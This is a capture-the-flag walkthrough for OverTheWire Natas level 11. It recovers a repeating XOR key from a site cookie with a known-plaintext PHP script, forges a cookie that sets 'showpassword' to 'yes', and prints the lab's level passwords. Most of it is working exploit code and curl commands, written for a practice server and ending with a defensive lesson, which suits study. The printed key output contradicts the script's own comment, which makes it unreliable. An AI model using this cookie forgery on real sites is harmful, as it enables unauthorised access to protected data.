Username: natas11
Password: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg
URL: http://natas11.natas.labs.overthewire.org
curl -i -XGET -u natas11:1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg http://natas11.natas.labs.overthewire.org/ | grep -i set-cookie
==> Set-Cookie: data=MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY%3D
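Note: the scripts below need the PHP command-line interpreter (sudo apt install php).
Create a file that decodes the cookie and XORs it with the known default JSON to recover the key: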
nvim natas11.php
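<?php
// Known-plaintext key recovery for a repeating-key XOR cookie.
// The cookie is base64(json XOR key), so cookie_bytes XOR json gives the key
// repeated over and over.

// The JSON that was serialised into the cookie captured above. It has to match
// the encrypted plaintext byte for byte: with "yes" in place of "no" the output
// stops repeating at the 18th byte, which is where the two strings diverge.
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

/**
 * XOR $in against the raw bytes of the captured cookie.
 *
 * XOR is its own inverse, so running the known plaintext through the
 * "encrypt" routine with the ciphertext in the key slot yields the keystream.
 *
 * @param string $in Known plaintext (the JSON-encoded default data).
 * @return string The keystream; a short repeating key shows up as a repeating pattern.
 */
function xor_encrypt($in) {
    // The Set-Cookie value is URL-encoded (%3D is '='). Non-strict
    // base64_decode() silently drops the '%' and then decodes "3D" as data,
    // appending a bogus byte, so undo the URL encoding first.
    $cipher = base64_decode(rawurldecode('MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY%3D'));
    $cipherLen = strlen($cipher);
    $inLen = strlen($in);
    $outText = '';
    for ($i = 0; $i < $inLen; $i++) {
        // Byte-wise XOR; the modulo only matters if $in is longer than the cookie.
        $outText .= $in[$i] ^ $cipher[$i % $cipherLen];
    }
    return $outText;
}

$key = xor_encrypt(json_encode($defaultdata));
echo $key;
?>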
php -f natas11.php
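==> KNHLKNHLKNHLKNHLKYBEIOBKOVPTJ --> the repeating unit, KNHL, is the XOR key. (The output repeats only for as long as the guessed plaintext matches what was actually encrypted into the cookie.)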
<?php
// Re-encode the cookie payload with the recovered key so that the JSON says
// "showpassword":"yes". The pipeline is: json_encode -> XOR -> base64.
$defaultdata = array("showpassword" => "yes", "bgcolor" => "#ffffff");

/**
 * Repeating-key XOR of $in with the four-byte key recovered earlier.
 *
 * @param string $in Bytes to transform.
 * @return string $in XORed byte by byte with the key, the key wrapping around.
 */
function xor_encrypt($in) {
    $secret = 'KNHL';
    $secretLen = strlen($secret);
    $total = strlen($in);
    $result = '';
    $pos = 0;
    while ($pos < $total) {
        $result .= $in[$pos] ^ $secret[$pos % $secretLen];
        $pos++;
    }
    return $result;
}

// Despite the name, $key holds the finished cookie value, not a key.
$key = base64_encode(xor_encrypt(json_encode($defaultdata)));
echo $key;
?>
php -f natas11.php
curl -i -XPOST -u natas11:1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg http://natas11.natas.labs.overthewire.org/ -d "bgcolor=#ffffff" -d "submit=" --cookie data=MGw7JCQ5OC04PT8jOSpqdmk3LT9pYmouLC0nICQ8anZpbS4qLSguKmkz
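Alright, I got the password! The server trusted a cookie protected only by a repeating-key XOR, and one known plaintext is enough to undo that; state kept on the client needs an integrity check such as an HMAC, or it should stay on the server. Moving on to level 12!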
==> CTF: { natas12:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG }

